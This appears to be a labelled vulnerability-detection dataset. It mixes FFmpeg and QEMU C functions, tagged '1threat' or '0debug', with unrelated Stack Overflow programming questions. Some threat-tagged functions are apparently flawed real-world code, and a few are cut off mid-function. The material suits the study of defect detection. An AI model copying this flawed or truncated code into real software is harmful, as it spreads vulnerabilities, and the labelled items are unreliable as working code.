cpu_flags, srcFilter->lumV, dstFilter->lumV,
c->param, 0) < 0)
goto fail;
if (initFilter(&c->vChrFilter, &c->vChrFilterPos, &c->vChrFilterSize,
c->chrYInc, c->chrSrcH, c->chrDstH,
filterAlign, (1 << 12),
(flags & SWS_BICUBLIN) ? (flags | SWS_BILINEAR) : flags,
cpu_flags, srcFilter->chrV, dstFilter->chrV,
c->param, 0) < 0)
goto fail;
#if HAVE_ALTIVEC
FF_ALLOC_OR_GOTO(c, c->vYCoeffsBank, sizeof(vector signed short) * c->vLumFilterSize * c->dstH, fail);
FF_ALLOC_OR_GOTO(c, c->vCCoeffsBank, sizeof(vector signed short) * c->vChrFilterSize * c->chrDstH, fail);
for (i = 0; i < c->vLumFilterSize * c->dstH; i++) {
int j;
short *p = (short *)&c->vYCoeffsBank[i];
for (j = 0; j < 8; j++)
p[j] = c->vLumFilter[i];
}
for (i = 0; i < c->vChrFilterSize * c->chrDstH; i++) {
int j;
short *p = (short *)&c->vCCoeffsBank[i];
for (j = 0; j < 8; j++)
p[j] = c->vChrFilter[i];
}
#endif
}
c->vLumBufSize = c->vLumFilterSize;
c->vChrBufSize = c->vChrFilterSize;
for (i = 0; i < dstH; i++) {
int chrI = (int64_t)i * c->chrDstH / dstH;
int nextSlice = FFMAX(c->vLumFilterPos[i] + c->vLumFilterSize - 1,
((c->vChrFilterPos[chrI] + c->vChrFilterSize - 1)
<< c->chrSrcVSubSample));
nextSlice >>= c->chrSrcVSubSample;
nextSlice <<= c->chrSrcVSubSample;
if (c->vLumFilterPos[i] + c->vLumBufSize < nextSlice)
c->vLumBufSize = nextSlice - c->vLumFilterPos[i];
if (c->vChrFilterPos[chrI] + c->vChrBufSize <
(nextSlice >> c->chrSrcVSubSample))
c->vChrBufSize = (nextSlice >> c->chrSrcVSubSample) -
c->vChrFilterPos[chrI];
}
FF_ALLOC_OR_GOTO(c, c->lumPixBuf, c->vLumBufSize * 3 * sizeof(int16_t *), fail);
FF_ALLOC_OR_GOTO(c, c->chrUPixBuf, c->vChrBufSize * 3 * sizeof(int16_t *), fail);
FF_ALLOC_OR_GOTO(c, c->chrVPixBuf, c->vChrBufSize * 3 * sizeof(int16_t *), fail);
if (CONFIG_SWSCALE_ALPHA && isALPHA(c->srcFormat) && isALPHA(c->dstFormat))
FF_ALLOCZ_OR_GOTO(c, c->alpPixBuf, c->vLumBufSize * 3 * sizeof(int16_t *), fail);
for (i = 0; i < c->vLumBufSize; i++) {
FF_ALLOCZ_OR_GOTO(c, c->lumPixBuf[i + c->vLumBufSize],
dst_stride + 16, fail);
c->lumPixBuf[i] = c->lumPixBuf[i + c->vLumBufSize];
}
c->uv_off_px = dst_stride_px + 64 / (c->dstBpc & ~7);
c->uv_off_byte = dst_stride + 16;
for (i = 0; i < c->vChrBufSize; i++) {
FF_ALLOC_OR_GOTO(c, c->chrUPixBuf[i + c->vChrBufSize],
dst_stride * 2 + 32, fail);
c->chrUPixBuf[i] = c->chrUPixBuf[i + c->vChrBufSize];
c->chrVPixBuf[i] = c->chrVPixBuf[i + c->vChrBufSize]
= c->chrUPixBuf[i] + (dst_stride >> 1) + 8;
}
if (CONFIG_SWSCALE_ALPHA && c->alpPixBuf)
for (i = 0; i < c->vLumBufSize; i++) {
FF_ALLOCZ_OR_GOTO(c, c->alpPixBuf[i + c->vLumBufSize],
dst_stride + 16, fail);
c->alpPixBuf[i] = c->alpPixBuf[i + c->vLumBufSize];
}
for (i = 0; i < c->vChrBufSize; i++)
memset(c->chrUPixBuf[i], 64, dst_stride * 2 + 1);
assert(c->chrDstH <= dstH);
if (flags & SWS_PRINT_INFO) {
if (flags & SWS_FAST_BILINEAR)
av_log(c, AV_LOG_INFO, "FAST_BILINEAR scaler, ");
else if (flags & SWS_BILINEAR)
av_log(c, AV_LOG_INFO, "BILINEAR scaler, ");
else if (flags & SWS_BICUBIC)
av_log(c, AV_LOG_INFO, "BICUBIC scaler, ");
else if (flags & SWS_X)
av_log(c, AV_LOG_INFO, "Experimental scaler, ");
else if (flags & SWS_POINT)
av_log(c, AV_LOG_INFO, "Nearest Neighbor / POINT scaler, ");
else if (flags & SWS_AREA)
av_log(c, AV_LOG_INFO, "Area Averaging scaler, ");
else if (flags & SWS_BICUBLIN)
av_log(c, AV_LOG_INFO, "luma BICUBIC / chroma BILINEAR scaler, ");
else if (flags & SWS_GAUSS)
av_log(c, AV_LOG_INFO, "Gaussian scaler, ");
else if (flags & SWS_SINC)
av_log(c, AV_LOG_INFO, "Sinc scaler, ");
else if (flags & SWS_LANCZOS)
av_log(c, AV_LOG_INFO, "Lanczos scaler, ");
else if (flags & SWS_SPLINE)
av_log(c, AV_LOG_INFO, "Bicubic spline scaler, ");
else
av_log(c, AV_LOG_INFO, "ehh flags invalid?! ");
av_log(c, AV_LOG_INFO, "from %s to %s%s ",
sws_format_name(srcFormat),
#ifdef DITHER1XBPP
dstFormat == AV_PIX_FMT_BGR555 || dstFormat == AV_PIX_FMT_BGR565 ||
dstFormat == AV_PIX_FMT_RGB444BE || dstFormat == AV_PIX_FMT_RGB444LE ||
dstFormat == AV_PIX_FMT_BGR444BE || dstFormat == AV_PIX_FMT_BGR444LE ?
"dithered " : "",
#else
"",
#endif
sws_format_name(dstFormat));
if (INLINE_MMXEXT(cpu_flags))
av_log(c, AV_LOG_INFO, "using MMXEXT\n");
else if (INLINE_AMD3DNOW(cpu_flags))
av_log(c, AV_LOG_INFO, "using 3DNOW\n");
else if (INLINE_MMX(cpu_flags))
av_log(c, AV_LOG_INFO, "using MMX\n");
else if (PPC_ALTIVEC(cpu_flags))
av_log(c, AV_LOG_INFO, "using AltiVec\n");
else
av_log(c, AV_LOG_INFO, "using C\n");
av_log(c, AV_LOG_VERBOSE, "%dx%d -> %dx%d\n", srcW, srcH, dstW, dstH);
av_log(c, AV_LOG_DEBUG,
"lum srcW=%d srcH=%d dstW=%d dstH=%d xInc=%d yInc=%d\n",
c->srcW, c->srcH, c->dstW, c->dstH, c->lumXInc, c->lumYInc);
av_log(c, AV_LOG_DEBUG,
"chr srcW=%d srcH=%d dstW=%d dstH=%d xInc=%d yInc=%d\n",
c->chrSrcW, c->chrSrcH, c->chrDstW, c->chrDstH,
c->chrXInc, c->chrYInc);
}
c->swscale = ff_getSwsFunc(c);
return 0;
fail:
return -1;
}
| 1threat
|
Came up with a serialization algorithm for strings, but it only works for words that are < 10 letters long. Help? : I have a question about a serialization algorithm I just came up with; I want to know whether it already exists and whether there is a better version out there.
We know the usual algorithms join the words in a list with a delimiter, but then you have to scan every word for occurrences of the delimiter and escape them, or the serialization isn't robust. I thought a more intuitive approach would be to use a higher-level language like Python, where `len()` is `O(1)`, and prepend the length to each word, as in the code attached below.
Wouldn't this be faster, because instead of going through every letter of every word we just go through every word? And during deserialization we don't have to look through every character to find the delimiter; we can skip directly to the end of each word.
The only problem I see is that double-digit sizes would cause problems, but I'm sure there's a way around that which I haven't found yet.
It was suggested to me that [protocol buffers](https://developers.google.com/protocol-buffers/) are similar to this idea, but I haven't understood why yet.
def serialize(list_o_words):
    return ''.join(str(len(word)) + word for word in list_o_words)

def deserialize(serialized_list_o_words):
    index = 0
    deserialized_list = []
    while index < len(serialized_list_o_words):
        word_length = int(serialized_list_o_words[index])
        next_index = index + word_length + 1
        deserialized_list.append(serialized_list_o_words[index+1:next_index])
        index = next_index
    return deserialized_list
serialized_list = "dick,for,breakfast,pussy,for,lunch,but,please,don't,munch,haba1,daba2".split(",")
print(serialize(serialized_list))
print(deserialize(serialize(serialized_list)) == serialized_list)
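The usual fix for multi-digit lengths is to terminate the length with a character that can never appear inside it, e.g. the netstring-style "length:payload" form; this is also essentially what protocol buffers do with length-delimited fields (a varint length followed by that many bytes). A sketch adapting the code above:

    def serialize(list_o_words):
        # "5:hello12:serializable" -- the ':' ends the length, so 10+ letter words work
        return ''.join('%d:%s' % (len(word), word) for word in list_o_words)

    def deserialize(data):
        index = 0
        words = []
        while index < len(data):
            colon = data.index(':', index)
            word_length = int(data[index:colon])
            words.append(data[colon + 1:colon + 1 + word_length])
            index = colon + 1 + word_length
        return words

    words = "short,averylongword,with,morethantenletters".split(",")
    assert deserialize(serialize(words)) == words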
| 0debug
|
How can I create and run both an angular and react app in asp.net core 2.1 app? : <p>This <a href="https://docs.microsoft.com/en-us/aspnet/core/client-side/spa/angular?view=aspnetcore-2.1&tabs=visual-studio" rel="nofollow noreferrer">page</a> talks about creating an <strong>angular</strong> app in the <code>ClientApp</code> folder. I want to create a <strong>react</strong> app which can be accessed through another asp.net MVC route.</p>
<p>What changes do I have to make in the ASP.NET Core application created by <strong>Visual Studio 2017</strong> to have both SPAs running?</p>
| 0debug
|
How can I convert a .NET Core project to a .NET Framework project? : <p>I created a "Console App (.NET Core)" project in Visual Studio. Now I need to add a dependency that only works on .NET Framework 4.6+, not .NET Core.</p>
<p>Is there a way to convert my project to a full .NET Framework project?</p>
<hr>
<p>Here's what I've tried:</p>
<p>I went to the project properties and attempted to change the project framework, but I don't see the option I need in the dropdown:</p>
<p><a href="https://i.stack.imgur.com/FCln8.png" rel="noreferrer"><img src="https://i.stack.imgur.com/FCln8.png" alt="Only .NETCoreApp displays in the target framework list."></a></p>
<p>If I click "Install other frameworks..." I'm taken to <a href="https://www.microsoft.com/net/targeting" rel="noreferrer">a page</a> that says .NET Framework versions are included in Visual Studio 2017 -- which is exactly what I'm using to edit this project. This is where I got stuck.</p>
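<p>With the new SDK-style project file the target is just a property, so one common approach is to close the solution, edit the <code>.csproj</code> by hand, change <code>TargetFramework</code>, and reload/restore. A sketch; the value being replaced and the chosen framework moniker (<code>net461</code> here) depend on your project:</p>
<pre><code><Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <!-- was something like: <TargetFramework>netcoreapp1.1</TargetFramework> -->
    <TargetFramework>net461</TargetFramework>
  </PropertyGroup>
</Project>
</code></pre>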
| 0debug
|
void init_paths(const char *prefix)
{
char pref_buf[PATH_MAX];
if (prefix[0] == '\0' ||
!strcmp(prefix, "/"))
return;
if (prefix[0] != '/') {
char *cwd = getcwd(NULL, 0);
size_t pref_buf_len = sizeof(pref_buf);
if (!cwd)
abort();
pstrcpy(pref_buf, sizeof(pref_buf), cwd);
pstrcat(pref_buf, pref_buf_len, "/");
pstrcat(pref_buf, pref_buf_len, prefix);
free(cwd);
} else
pstrcpy(pref_buf, sizeof(pref_buf), prefix + 1);
base = new_entry("", NULL, pref_buf);
base = add_dir_maybe(base);
if (base->num_entries == 0) {
g_free(base->pathname);
free(base->name);
free(base);
base = NULL;
} else {
set_parents(base, base);
}
}
| 1threat
|
Webpack 4: SCSS to CSS in a separate file : <p>I would like to use Webpack 4 to transpile my ES6 JavaScript separately from my Sass:</p>
<ul>
<li>src/js/index.js → static/js/index.js</li>
<li>src/css/style.scss → static/css/style.css</li>
</ul>
<p>Currently my webpack configuration seems to correctly transpile the javascript into a bundle.js but I cannot get my SCSS to transpile to CSS correctly. </p>
<p>I would definitely try to debug somehow but since I'm very ignorant on Webpack internals I'm not sure how to do it. </p>
<p>Following my webpack.config.js:</p>
<pre><code>const ExtractTextPlugin = require('extract-text-webpack-plugin');
const path = require('path');
module.exports = {
mode: 'development',
entry: {
bundle: './src/js/index.js',
},
output: {
filename: '[name].js',
path: path.resolve('static/js')
},
module: {
rules: [{
test: /\.scss$/,
use: ExtractTextPlugin.extract({
fallback: 'style-loader',
use: [
{ loader: "css-loader" },
{
loader: "sass-loader",
options: {
includePaths: [
path.resolve("./src/css")
]
}
},
]
}),
}]
},
plugins: [
new ExtractTextPlugin({
filename: path.resolve('static/css/style.css')
})
],
}
</code></pre>
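<p>One likely cause is that extract-text-webpack-plugin does not support CSS extraction under webpack 4; its usual replacement is mini-css-extract-plugin. A sketch of the relevant parts of the config: the SCSS file still has to be imported from <code>index.js</code> (or added as its own entry) for webpack to see it, and the <code>filename</code> is resolved relative to <code>output.path</code>, which is <code>static/js</code> here:</p>
<pre><code>const MiniCssExtractPlugin = require('mini-css-extract-plugin');

module.exports = {
  // ...entry/output as before...
  module: {
    rules: [{
      test: /\.scss$/,
      use: [
        MiniCssExtractPlugin.loader,
        'css-loader',
        'sass-loader'
      ]
    }]
  },
  plugins: [
    new MiniCssExtractPlugin({
      filename: '../css/style.css'   // ends up in static/css/style.css
    })
  ]
};
</code></pre>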
| 0debug
|
Specialized shouldComponentUpdate on PureComponent : <p>I am trying to create a component that shouldn't update when a certain property is true, but should perform a shallow compare otherwise (the default for <code>PureComponent</code>).</p>
<p>I've tried doing the following behavior:</p>
<pre><code>export default class ContentsListView extends PureComponent<Props> {
shouldComponentUpdate(props: Props) {
if (props.selecting) {
return false;
}
return super.shouldComponentUpdate(props);
}
render() {
}
}
</code></pre>
<p>However, <code>super.shouldComponentUpdate</code> is not defined. Is there some way to "tap into" the shallow compare of <code>PureComponent</code> without writing my own?</p>
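<p>One reason it is undefined: <code>PureComponent</code> implements the shallow comparison internally rather than as an overridable <code>shouldComponentUpdate</code>, so there is nothing to call on <code>super</code>. A sketch of one workaround, extending <code>Component</code> and doing the shallow compare by hand; the <code>shallowEqual</code> helper below is hand-rolled, not a React export:</p>
<pre><code>import React, { Component } from 'react';

function shallowEqual(a, b) {
  const keysA = Object.keys(a);
  const keysB = Object.keys(b);
  return keysA.length === keysB.length &&
         keysA.every(key => a[key] === b[key]);
}

export default class ContentsListView extends Component {
  shouldComponentUpdate(nextProps, nextState) {
    if (nextProps.selecting) {
      return false;                                  // freeze while selecting
    }
    return !shallowEqual(this.props, nextProps) ||
           !shallowEqual(this.state || {}, nextState || {});
  }

  render() {
    return null; // render as before
  }
}
</code></pre>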
| 0debug
|
App not opening programmatically? : I installed the Meeseva app on my device. When I open it programmatically, it does not open.
if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"Meeseva App://location?id=1"]]) {
NSString *mystr=[[NSString alloc] initWithFormat:@"Meeseva App://location?id=1"];
NSURL *myurl=[[NSURL alloc] initWithString:mystr];
[[UIApplication sharedApplication] openURL:myurl];
}
When I open fb, twitter, google+ and so on this way, they all open successfully.
Can anyone solve this issue?
The app link is:
https://itunes.apple.com/in/app/meeseva-app/id1121539928?mt=8
Is there any other way to open an installed app programmatically?
| 0debug
|
Property does not exist on type 'object' : <p>I have the following setup, and when I loop through using <code>for...of</code> I get the error "Property 'country' does not exist on type 'object'". Is this the correct way to loop through each object in the array and compare an object property value?</p>
<pre><code>let countryProviders: object[];
export function GetAllProviders() {
allProviders = [
{ region: "r 1", country: "US", locale: "en-us", company: "co 1" },
{ region: "r 2", country: "China", locale: "zh-cn", company: "co 2" },
{ region: "r 4", country: "Korea", locale: "ko-kr", company: "co 4" },
{ region: "r 5", country: "Japan", locale: "ja-jp", company: "co 5" }
]
for (let providers of allProviders) {
if (providers.country === "US") { // error here
countryProviders.push(providers);
}
}
}
</code></pre>
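<p>One fix is to give the array an element type instead of the member-less <code>object</code> type; a sketch with an interface (the interface name is illustrative):</p>
<pre><code>interface Provider {
  region: string;
  country: string;
  locale: string;
  company: string;
}

let countryProviders: Provider[] = [];

export function GetAllProviders() {
  const allProviders: Provider[] = [
    { region: "r 1", country: "US", locale: "en-us", company: "co 1" },
    { region: "r 2", country: "China", locale: "zh-cn", company: "co 2" }
    // ...
  ];
  for (const provider of allProviders) {
    if (provider.country === "US") {   // no error: country is declared on Provider
      countryProviders.push(provider);
    }
  }
}
</code></pre>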
| 0debug
|
Web interface for my Swift app : I learned how to code in Swift a little while back and created my first app. Now that I'm trying to market it to customers, I've realized that a web interface might be what I need to scale this up and start attracting clients.
I use Firebase as my backend now and would like to see what I can do to have a web interface that:
allows customers to log in to see their unique data,
updates info on my Firebase backend,
and is scalable.
I'm not sure where to start nor how long this process will take. Does anyone have any ideas on where to get started?
| 0debug
|
int avfilter_process_command(AVFilterContext *filter, const char *cmd, const char *arg, char *res, int res_len, int flags)
{
if(!strcmp(cmd, "ping")){
av_strlcatf(res, res_len, "pong from:%s %s\n", filter->filter->name, filter->name);
return 0;
}else if(!strcmp(cmd, "enable")) {
return set_enable_expr(filter, arg);
}else if(filter->filter->process_command) {
return filter->filter->process_command(filter, cmd, arg, res, res_len, flags);
return AVERROR(ENOSYS);
| 1threat
|
How to add a conditional to a redirect.php file? : if(){
header ('Location: http://www.misitio1.com');
}else{
header ('Location: http://www.misitio2.com');
}
This is what I have so far. How do I add the time to the conditional, so that when the seconds (or minutes) are even it redirects to site 1, and when they are odd it redirects to site 2?
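A minimal sketch using date('s') for the current seconds (swap in date('i') for minutes); header() must run before any output and is usually followed by exit:

    <?php
    $seconds = (int) date('s');

    if ($seconds % 2 === 0) {
        header('Location: http://www.misitio1.com');
    } else {
        header('Location: http://www.misitio2.com');
    }
    exit;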
| 0debug
|
How to get the bin folder in ASP.NET Core 1.0 : <p>ASP.NET Core 1.0 adds lots of functionality, but there is no obvious way to get the bin folder path.</p>
<p>Does anyone know how to get the bin folder path for an ASP.NET Core 1.0 application?</p>
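<p>One option that works on .NET Core 1.0 is <code>AppContext.BaseDirectory</code>, which points at the directory the application's assemblies are loaded from (the bin output folder when running from it). A sketch; the <code>Startup</code> type in the alternative is just any type from your own assembly:</p>
<pre><code>using System;
using System.IO;
using System.Reflection;

string baseDir = AppContext.BaseDirectory;

// alternative: the folder of a specific assembly
string asmDir = Path.GetDirectoryName(
    typeof(Startup).GetTypeInfo().Assembly.Location);
</code></pre>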
| 0debug
|
int socket_connect(SocketAddress *addr, Error **errp,
NonBlockingConnectHandler *callback, void *opaque)
{
int fd;
switch (addr->type) {
case SOCKET_ADDRESS_KIND_INET:
fd = inet_connect_saddr(addr->u.inet, errp, callback, opaque);
break;
case SOCKET_ADDRESS_KIND_UNIX:
fd = unix_connect_saddr(addr->u.q_unix, errp, callback, opaque);
break;
case SOCKET_ADDRESS_KIND_FD:
fd = monitor_get_fd(cur_mon, addr->u.fd->str, errp);
if (fd >= 0 && callback) {
qemu_set_nonblock(fd);
callback(fd, NULL, opaque);
}
break;
default:
abort();
}
return fd;
}
| 1threat
|
void tcg_prologue_init(TCGContext *s)
{
s->code_buf = s->code_gen_prologue;
s->code_ptr = s->code_buf;
tcg_target_qemu_prologue(s);
flush_icache_range((tcg_target_ulong)s->code_buf,
(tcg_target_ulong)s->code_ptr);
| 1threat
|
How to combine two strings in PHP : I want to combine two words to get a list of other words containing their letters, for example:
jack & sara
jaca, jara, jacka, jacra, jsara, jacara, jackra, jasara, jackara, jacsara
sara & jack
sack, sark, sarak, sarck, sjack, sajack, sarack, sarjack
| 0debug
|
static int unpack_vectors(Vp3DecodeContext *s, GetBitContext *gb)
{
int j, k, l, sb_x, sb_y;
int coding_mode;
int motion_x[6];
int motion_y[6];
int last_motion_x = 0;
int last_motion_y = 0;
int prior_last_motion_x = 0;
int prior_last_motion_y = 0;
int current_macroblock;
int current_fragment;
if (s->keyframe)
return 0;
memset(motion_x, 0, 6 * sizeof(int));
memset(motion_y, 0, 6 * sizeof(int));
coding_mode = get_bits1(gb);
for (sb_y = 0; sb_y < s->y_superblock_height; sb_y++) {
for (sb_x = 0; sb_x < s->y_superblock_width; sb_x++) {
for (j = 0; j < 4; j++) {
int mb_x = 2*sb_x + (j>>1);
int mb_y = 2*sb_y + (((j>>1)+j)&1);
current_macroblock = mb_y * s->macroblock_width + mb_x;
if (mb_x >= s->macroblock_width || mb_y >= s->macroblock_height ||
(s->macroblock_coding[current_macroblock] == MODE_COPY))
continue;
switch (s->macroblock_coding[current_macroblock]) {
case MODE_INTER_PLUS_MV:
case MODE_GOLDEN_MV:
if (coding_mode == 0) {
motion_x[0] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
motion_y[0] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
} else {
motion_x[0] = fixed_motion_vector_table[get_bits(gb, 6)];
motion_y[0] = fixed_motion_vector_table[get_bits(gb, 6)];
}
if (s->macroblock_coding[current_macroblock] ==
MODE_INTER_PLUS_MV) {
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
last_motion_x = motion_x[0];
last_motion_y = motion_y[0];
}
break;
case MODE_INTER_FOURMV:
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
motion_x[4] = motion_y[4] = 0;
for (k = 0; k < 4; k++) {
current_fragment = BLOCK_Y*s->fragment_width + BLOCK_X;
for (l = 0; l < s->coded_fragment_list_index; l++)
if (s->coded_fragment_list[l] == current_fragment)
break;
if (l < s->coded_fragment_list_index) {
if (coding_mode == 0) {
motion_x[k] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
motion_y[k] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
} else {
motion_x[k] = fixed_motion_vector_table[get_bits(gb, 6)];
motion_y[k] = fixed_motion_vector_table[get_bits(gb, 6)];
}
last_motion_x = motion_x[k];
last_motion_y = motion_y[k];
} else {
motion_x[k] = 0;
motion_y[k] = 0;
}
motion_x[4] += motion_x[k];
motion_y[4] += motion_y[k];
}
motion_x[5]=
motion_x[4]= RSHIFT(motion_x[4], 2);
motion_y[5]=
motion_y[4]= RSHIFT(motion_y[4], 2);
break;
case MODE_INTER_LAST_MV:
motion_x[0] = last_motion_x;
motion_y[0] = last_motion_y;
break;
case MODE_INTER_PRIOR_LAST:
motion_x[0] = prior_last_motion_x;
motion_y[0] = prior_last_motion_y;
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
last_motion_x = motion_x[0];
last_motion_y = motion_y[0];
break;
default:
motion_x[0] = 0;
motion_y[0] = 0;
break;
}
for (k = 0; k < 4; k++) {
current_fragment =
BLOCK_Y*s->fragment_width + BLOCK_X;
if (s->macroblock_coding[current_macroblock] == MODE_INTER_FOURMV) {
s->all_fragments[current_fragment].motion_x = motion_x[k];
s->all_fragments[current_fragment].motion_y = motion_y[k];
} else {
s->all_fragments[current_fragment].motion_x = motion_x[0];
s->all_fragments[current_fragment].motion_y = motion_y[0];
}
}
for (k = 0; k < 2; k++) {
current_fragment = s->fragment_start[k+1] +
mb_y*(s->fragment_width>>1) + mb_x;
if (s->macroblock_coding[current_macroblock] == MODE_INTER_FOURMV) {
s->all_fragments[current_fragment].motion_x = motion_x[k+4];
s->all_fragments[current_fragment].motion_y = motion_y[k+4];
} else {
s->all_fragments[current_fragment].motion_x = motion_x[0];
s->all_fragments[current_fragment].motion_y = motion_y[0];
}
}
}
}
}
return 0;
}
| 1threat
|
static int init_muxer(AVFormatContext *s, AVDictionary **options)
{
int ret = 0, i;
AVStream *st;
AVDictionary *tmp = NULL;
AVCodecParameters *par = NULL;
AVOutputFormat *of = s->oformat;
const AVCodecDescriptor *desc;
AVDictionaryEntry *e;
if (options)
av_dict_copy(&tmp, *options, 0);
if ((ret = av_opt_set_dict(s, &tmp)) < 0)
goto fail;
if (s->priv_data && s->oformat->priv_class && *(const AVClass**)s->priv_data==s->oformat->priv_class &&
(ret = av_opt_set_dict2(s->priv_data, &tmp, AV_OPT_SEARCH_CHILDREN)) < 0)
goto fail;
#if FF_API_LAVF_AVCTX
FF_DISABLE_DEPRECATION_WARNINGS
if (s->nb_streams && s->streams[0]->codec->flags & AV_CODEC_FLAG_BITEXACT) {
if (!(s->flags & AVFMT_FLAG_BITEXACT)) {
#if FF_API_LAVF_BITEXACT
av_log(s, AV_LOG_WARNING,
"Setting the AVFormatContext to bitexact mode, because "
"the AVCodecContext is in that mode. This behavior will "
"change in the future. To keep the current behavior, set "
"AVFormatContext.flags |= AVFMT_FLAG_BITEXACT.\n");
s->flags |= AVFMT_FLAG_BITEXACT;
#else
av_log(s, AV_LOG_WARNING,
"The AVFormatContext is not in set to bitexact mode, only "
"the AVCodecContext. If this is not intended, set "
"AVFormatContext.flags |= AVFMT_FLAG_BITEXACT.\n");
#endif
}
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
if (s->nb_streams == 0 && !(of->flags & AVFMT_NOSTREAMS)) {
av_log(s, AV_LOG_ERROR, "No streams to mux were specified\n");
ret = AVERROR(EINVAL);
goto fail;
}
for (i = 0; i < s->nb_streams; i++) {
st = s->streams[i];
par = st->codecpar;
#if FF_API_LAVF_CODEC_TB
FF_DISABLE_DEPRECATION_WARNINGS
if (!st->time_base.num && st->codec->time_base.num) {
av_log(s, AV_LOG_WARNING, "Using AVStream.codec.time_base as a "
"timebase hint to the muxer is deprecated. Set "
"AVStream.time_base instead.\n");
avpriv_set_pts_info(st, 64, st->codec->time_base.num, st->codec->time_base.den);
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
#if FF_API_LAVF_AVCTX
FF_DISABLE_DEPRECATION_WARNINGS
if (st->codecpar->codec_type == AVMEDIA_TYPE_UNKNOWN &&
st->codec->codec_type != AVMEDIA_TYPE_UNKNOWN) {
av_log(s, AV_LOG_WARNING, "Using AVStream.codec to pass codec "
"parameters to muxers is deprecated, use AVStream.codecpar "
"instead.\n");
ret = avcodec_parameters_from_context(st->codecpar, st->codec);
if (ret < 0)
goto fail;
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
ret = avcodec_parameters_to_context(st->internal->avctx, st->codecpar);
if (ret < 0)
goto fail;
if (!st->time_base.num) {
if (par->codec_type == AVMEDIA_TYPE_AUDIO && par->sample_rate)
avpriv_set_pts_info(st, 64, 1, par->sample_rate);
else
avpriv_set_pts_info(st, 33, 1, 90000);
}
switch (par->codec_type) {
case AVMEDIA_TYPE_AUDIO:
if (par->sample_rate <= 0) {
av_log(s, AV_LOG_ERROR, "sample rate not set\n");
ret = AVERROR(EINVAL);
goto fail;
}
if (!par->block_align)
par->block_align = par->channels *
av_get_bits_per_sample(par->codec_id) >> 3;
break;
case AVMEDIA_TYPE_VIDEO:
if ((par->width <= 0 || par->height <= 0) &&
!(of->flags & AVFMT_NODIMENSIONS)) {
av_log(s, AV_LOG_ERROR, "dimensions not set\n");
ret = AVERROR(EINVAL);
goto fail;
}
if (av_cmp_q(st->sample_aspect_ratio, par->sample_aspect_ratio)
&& fabs(av_q2d(st->sample_aspect_ratio) - av_q2d(par->sample_aspect_ratio)) > 0.004*av_q2d(st->sample_aspect_ratio)
) {
if (st->sample_aspect_ratio.num != 0 &&
st->sample_aspect_ratio.den != 0 &&
par->sample_aspect_ratio.num != 0 &&
par->sample_aspect_ratio.den != 0) {
av_log(s, AV_LOG_ERROR, "Aspect ratio mismatch between muxer "
"(%d/%d) and encoder layer (%d/%d)\n",
st->sample_aspect_ratio.num, st->sample_aspect_ratio.den,
par->sample_aspect_ratio.num,
par->sample_aspect_ratio.den);
ret = AVERROR(EINVAL);
goto fail;
}
}
break;
}
desc = avcodec_descriptor_get(par->codec_id);
if (desc && desc->props & AV_CODEC_PROP_REORDER)
st->internal->reorder = 1;
if (of->codec_tag) {
if ( par->codec_tag
&& par->codec_id == AV_CODEC_ID_RAWVIDEO
&& ( av_codec_get_tag(of->codec_tag, par->codec_id) == 0
|| av_codec_get_tag(of->codec_tag, par->codec_id) == MKTAG('r', 'a', 'w', ' '))
&& !validate_codec_tag(s, st)) {
par->codec_tag = 0;
}
if (par->codec_tag) {
if (!validate_codec_tag(s, st)) {
char tagbuf[32], tagbuf2[32];
av_get_codec_tag_string(tagbuf, sizeof(tagbuf), par->codec_tag);
av_get_codec_tag_string(tagbuf2, sizeof(tagbuf2), av_codec_get_tag(s->oformat->codec_tag, par->codec_id));
av_log(s, AV_LOG_ERROR,
"Tag %s/0x%08x incompatible with output codec id '%d' (%s)\n",
tagbuf, par->codec_tag, par->codec_id, tagbuf2);
ret = AVERROR_INVALIDDATA;
goto fail;
}
} else
par->codec_tag = av_codec_get_tag(of->codec_tag, par->codec_id);
}
if (par->codec_type != AVMEDIA_TYPE_ATTACHMENT)
s->internal->nb_interleaved_streams++;
}
if (!s->priv_data && of->priv_data_size > 0) {
s->priv_data = av_mallocz(of->priv_data_size);
if (!s->priv_data) {
ret = AVERROR(ENOMEM);
goto fail;
}
if (of->priv_class) {
*(const AVClass **)s->priv_data = of->priv_class;
av_opt_set_defaults(s->priv_data);
if ((ret = av_opt_set_dict2(s->priv_data, &tmp, AV_OPT_SEARCH_CHILDREN)) < 0)
goto fail;
}
}
if (!(s->flags & AVFMT_FLAG_BITEXACT)) {
av_dict_set(&s->metadata, "encoder", LIBAVFORMAT_IDENT, 0);
} else {
av_dict_set(&s->metadata, "encoder", NULL, 0);
}
for (e = NULL; e = av_dict_get(s->metadata, "encoder-", e, AV_DICT_IGNORE_SUFFIX); ) {
av_dict_set(&s->metadata, e->key, NULL, 0);
}
if (options) {
av_dict_free(options);
*options = tmp;
}
if (s->oformat->init && (ret = s->oformat->init(s)) < 0) {
s->oformat->deinit(s);
goto fail;
}
return 0;
fail:
av_dict_free(&tmp);
return ret;
}
| 1threat
|
Django rest framework: Get detail view using a field other than primary key integer id : <p>My Product model has an extra field named "product_id", which is a UUID string. Currently I can get the product details based on the primary key id; I want to change this so the details are fetched using the "product_id" field instead.</p>
<p>My current urls.py</p>
<pre><code>url(r'^products/(?P<pk>[0-9]+)/$', views.ProductDetailCustom.as_view(), name='product-detail'),
</code></pre>
<p>Currently I am calling it like this:</p>
<pre><code>http://127.0.0.1:8000/api/v1/products/1460
</code></pre>
<p>I want it to be like this:</p>
<pre><code>http://127.0.0.1:8000/api/v1/products/04396134-3c90-ea7b-24ba-1fb0db11dbe5
</code></pre>
<p>views.py</p>
<pre><code>class ProductDetailCustom(generics.RetrieveAPIView):
queryset = Product.objects.all()
serializer_class = ProductCustomSerializer
</code></pre>
<p>serializer.py</p>
<pre><code>class ProductCustomSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ('url', 'id','product_id', 'title', 'description','structure','date_created',)
